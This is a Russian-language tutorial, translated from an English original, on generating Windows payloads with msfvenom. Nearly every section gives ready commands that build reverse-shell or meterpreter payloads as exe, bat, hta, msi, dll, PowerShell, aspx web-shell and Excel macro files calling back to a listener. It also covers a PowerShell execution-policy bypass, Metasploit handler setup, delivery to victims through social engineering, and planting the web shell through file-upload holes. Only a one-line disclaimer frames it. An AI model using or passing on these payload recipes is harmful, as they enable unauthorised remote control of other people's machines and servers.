В этой статье пойдет речь о Msfvenom. Инструмент отлично подходит для создания всех типов полезных нагрузок для платформы Windows.
Введение
Платформы, которые потребуются читателю, для осуществления практических действий:
- Kali Linux
- Windows
Msfvenom – это автономный генератор полезных нагрузок Metasploit, который также способен заменить msfpayload и msfencode.
Его синтаксис:
msfvenom -p (payload type) lhost=(Listening's_IP) lport=(Listening_Port) -f (Filetype) > (Output Filename)
Типы полезных нагрузок
Полезная нагрузка – это вредоносный скрипт, который злоумышленник использует для взаимодействия с целевой машиной с целью ее компрометации. Msfvenom поддерживает следующую платформу и формат для создания полезных нагрузок. Формат вывода данных может соответствовать исполняемым файлам, таким как .exe, .php, .dll, или быть представлен в виде однострочного файла.
Есть два основных типа полезных нагрузок.
- Stager: они обычно идентифицируются слэшем (/), к примеру: «windows/meterpreter/reverse_tcp»;
- Stageless: используется «_» вместе второго знака «/» в имени полезной нагрузки, к примеру: «windows/meterpreter_reverse_tcp».
Как уже было сказано выше, эта статья поможет изучить все возможные методы создания различных форматов полезной нагрузки для платформы Windows.
Исполняемая полезная нагрузка (.exe)
- Тип полезной нагрузки: Stager
Выполнение следующей команды для создания вредоносного exe-файла даст возможность получить исполняемый файл для Microsoft Windows:
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f exe > shell.exe
Весь вредоносный код будет записан внутри «shell.exe» файла и выполнен в виде exe-программы на целевой машине.
Следует поделиться этим файлом с целью, используя методы социальной инженерии, и дождаться его запуска. Помимо этого, необходимо запустить Netcat в качестве листенера для захвата обратного соединения.
nc –lvp 443
Пакетный файл Powershell
- Тип полезной нагрузки: Stager
Пользователь выполнит следующую команду для создания вредоносного пакетного файла (с расширением .bat) для DOS и Windows:
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 > shell.bat
Весь вредоносный код будет записан внутри файла «shell.bat» и выполнен в виде bat-скрипта на целевой машине.
Следует поделиться этим файлом с целью, используя методы социальной инженерии, и дождаться его запуска. Помимо этого, необходимо запустить Netcat в качестве листенера для захвата обратного соединения.
nc –lvp 443
Полезная нагрузка HTML Application (HTA)
- Тип полезной нагрузки: Stager
HTML-приложение (HTA) – это программа в Microsoft Windows, исходный код которой состоит из HTML, динамического HTML и одного или нескольких языков скриптов, поддерживаемых Internet Explorer, таких как VBScript или JScript.
Пользователь выполнит следующую команду, чтобы создать вредоносный HTA-файл, который используется для DOS и Windows.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta
Весь вредоносный код будет записан внутри файла «shell.hta» и выполнен в виде hta-скрипта на целевой машине. Помимо этого, пользователь будет использовать HTTP-сервер Python для обмена файлами.
mshta http://192.168.1.3/shell.hta
HTA будет выполнен с помощью программы «mshta.exe» или двойным щелчком по файлу.
Это приведет к получению обратного соединения через листенер Netcat, который работал в фоновом режиме для его захвата.
nc –lvp 443
Полезная нагрузка Microsoft Installer (MSI)
Установщик Windows также известен как установщик Microsoft. Файл MSI – это пакет Windows, который предоставляет информацию об установке, например, новых программ или инструментов. Его можно использовать для установки обновлений Windows или стороннего программного обеспечения в формате .exe.
Пользователь выполнит следующую команду, чтобы создать вредоносный MSI-файл, который используется для DOS и Windows. Он перенесет вредоносное ПО в целевую систему и запустит его.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f msi > shell.msi
Нужно использовать команду «msiexec» для запуска MSI-файла:
msiexec /quiet /qn /i shell.msi
Это приведет к получению обратного соединения через листенер Netcat, который работал в фоновом режиме для его захвата.
Полезная нагрузка Dynamic-link library (DLL)
- Тип полезной нагрузки: Stager
Библиотека DLL – это библиотека, которая содержит код и данные, что могут использоваться несколькими программами.
Пользователь выполнит следующую команду, чтобы создать вредоносный dll-файл, который используется для DOS и Windows. Он перенесет вредоносное ПО в целевую систему и выполнит его.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f dll > shell.dll
Следует использовать команду «rundll32» для запуска MSI-файла:
rundll32.exe shell.dll,0
Это приведет к получению обратного соединения через листенер Netcat, который работал в фоновом режиме для его захвата.
Полезная нагрузка Powershell (psh-cmd)
- Тип полезной нагрузки: Stager
- Формат: psh, psh-net, psh-reflection, psh-cmd
Сгенерированные полезные нагрузки в формате «psh», «psh-net» и «psh- reflection» имеют расширение «.ps1», а сгенерированные полезные нагрузки в формате «psh-cmd» получают другое расширение – «.cmd». Помимо этого, пользователь может напрямую выполнить исходный код в командной строке целевой системы.
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 -f psh-cmd > -f raw
Пользователь выполнит данную команду, чтобы сгенерировать исходный код для вредоносной программы PowerShell.
Для выполнения следует скопировать сгенерированный код и вставить его в командную строку Windows.
Это приведет к получению обратного соединения через листенер Netcat, который работал в фоновом режиме для его захвата.
Полезная нагрузка Powershell (ps1)
- Тип полезной нагрузки: Stager
Файл PS1 – это скрипт или «cmdlet», используемый Windows PowerShell. Файлы PS1 похожи на файлы формата «.BAT» и «.CMD», за исключением того, что они выполняются в PowerShell вместо командной строки Windows.
Пользователь выполнит следующую команду, чтобы создать вредоносный сценарий PS1 с расширением имени файла «.PS1», что используется в Windows PowerShell:
msfvenom -p windows/x64/meterpreter_reverse_https lhost=192.168.1.3 lport=443 -f psh > shell.ps1
Поскольку тип обратного Shell – meterpreter, необходимо запустить exploit/multi/handler внутри фреймворка Metasploit.
Политика выполнения PowerShell – это функция безопасности, которая управляет условиями, при которых PowerShell загружает файлы конфигурации и запускает скрипты. Данная функция помогает предотвратить выполнение вредоносных скриптов. Она предотвращает запуск всех файлов скриптов, включая файлы форматирования и конфигурации (.ps1xml), файлы скриптов модулей (.psm1) и профили PowerShell (.ps1).
Чтобы выполнить скрипт PS1, необходимо обойти политику выполнения, выполнив следующую команду в Windows PowerShell и запустив то, что нужно:
PowerShell –ep bypass
.\shell.ps1
msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter_reverse_https
Как только цель запустит скрипт «shell.ps1», хакер получит обратное соединение через сеанс meterpreter.
Полезная нагрузка Web shell (ASPX)
- Тип полезной нагрузки: Stageless
ASPX-файл – это файл Active Server Page Extended для платформы Microsoft ASP.NET. При просмотре URL-адреса страницы отображаются в веб-браузере пользователя, веб-формы .NET – их другое название.
Пользователь выполнит следующую команду, чтобы создать вредоносный скрипт-aspx с соответствующим расширением:
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f aspx > shell.aspx
Поскольку тип обратного Shell – meterpreter, необходимо запустить exploit/multi/handler внутри фреймворка Metasploit.
Пользователь может ввести эту полезную нагрузку для использования уязвимости Unrestricted File Upload, если целью является веб-сервер IIS.
Пользователь выполняет скрипт загрузки в веб-браузере.
msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter_reverse_https
Как только хакер выполнит вредоносный скрипт, он получит обратное соединение через сеанс meterpreter.
Полезная нагрузка Visual Basic (.vba)
- Тип полезной нагрузки: Stageless
VBA – это расширение файла, обычно ассоциируемое с Visual Basic, что поддерживает приложения Microsoft, такие как Microsoft Excel, Office, PowerPoint, Word и Publisher. Он используется для создания «макросов». что выполняются в Excel. Хакер пользуется привилегиями этих функций и создает вредоносный скрипт VB, который будет выполняться в виде программы макросов с помощью Microsoft Excel.
Пользователь выполнит следующую команду, чтобы создать вредоносный скрипт-aspx, который будет выполняться в виде макросов в Microsoft Excel:
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f vba
Теперь пользователь открывает его Workbook, в который введены вредоносные макросы.
Как только хакер выполнит вредоносный скрипт, он получит обратное соединение через сеанс meterepreter.
Автор переведённой статьи: Aarti Singh.
Важно! Информация исключительно в учебных целях. Пожалуйста, соблюдайте законодательство и не применяйте данную информацию в незаконных целях.
Больше интересного материала на cisoclub.ru. Подписывайтесь на нас: Facebook | VK | Twitter | Instagram | Telegram | Дзен | Мессенджер | ICQ New | YouTube | Pulse.